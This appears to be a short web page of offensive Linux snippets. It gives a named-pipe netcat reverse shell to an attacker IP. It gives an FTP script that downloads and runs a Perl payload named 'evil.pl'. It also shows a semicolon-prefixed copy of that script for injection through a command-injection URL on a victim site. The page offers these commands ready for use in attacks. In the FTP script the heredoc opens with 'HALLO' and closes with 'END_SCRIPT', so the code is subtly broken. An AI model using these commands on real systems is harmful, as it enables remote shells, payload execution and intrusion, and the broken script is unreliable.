Skip to content

Linux Snippets

Netcat without -e

A lot of machines have netcat installed but it's not usable for reverse shells. However, with this it becomes useable.

mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc <ATTACKER IP> <PORT> 1>/tmp/backpipe

FTP Non Interactive Transfer

Non-interactive FTP file transfer is slightly different from Windows. You can paste this into your terminal and everything will be handled for you. Just change HOST, USER, PASSWD, FILE to math your needs.

echo "#!/bin/sh" > ftp.sh
echo "HOST='<IP ADDRESS>'" >> ftp.sh
echo "USER='secret'" >> ftp.sh
echo "PASSWD='password1234'" >> ftp.sh
echo "FILE='evil.pl'" >> ftp.sh
echo "" >> ftp.sh
echo "ftp -n \$HOST << HALLO " >> ftp.sh
echo "quote USER \$USER" >> ftp.sh
echo "quote PASS \$PASSWD" >> ftp.sh
echo "bin" >> ftp.sh
echo "get \$FILE" >> ftp.sh
echo "quit" >> ftp.sh
echo "END_SCRIPT" >> ftp.sh
echo "exit 0" >> ftp.sh
chmod +x ftp.sh
bash ftp.sh
chmod +x evil.pl
perl evil.pl

Alternatively if you want to use this through a browser in a case like this: http://victim.comcmd.php?cmd='

Then just add semicolons to the beginning of each line. Then paste it into the <COMMANDS HERE> section. One thing to note is that the shebang sometimes doesn't pass through because of special characters. Encoding may help.

;echo "#!/bin/sh" > ftp.sh
;echo "HOST='<IP ADDRESS>'" >> ftp.sh
;echo "USER='secret'" >> ftp.sh
;echo "PASSWD='password1234'" >> ftp.sh
;echo "FILE='evil.pl'" >> ftp.sh
;echo "" >> ftp.sh
;echo "ftp -n \$HOST << HALLO " >> ftp.sh
;echo "quote USER \$USER" >> ftp.sh
;echo "quote PASS \$PASSWD" >> ftp.sh
;echo "bin" >> ftp.sh
;echo "get \$FILE" >> ftp.sh
;echo "quit" >> ftp.sh
;echo "END_SCRIPT" >> ftp.sh
;echo "exit 0" >> ftp.sh
;chmod +x ftp.sh
;bash ftp.sh
;chmod +x evil.pl
;perl evil.pl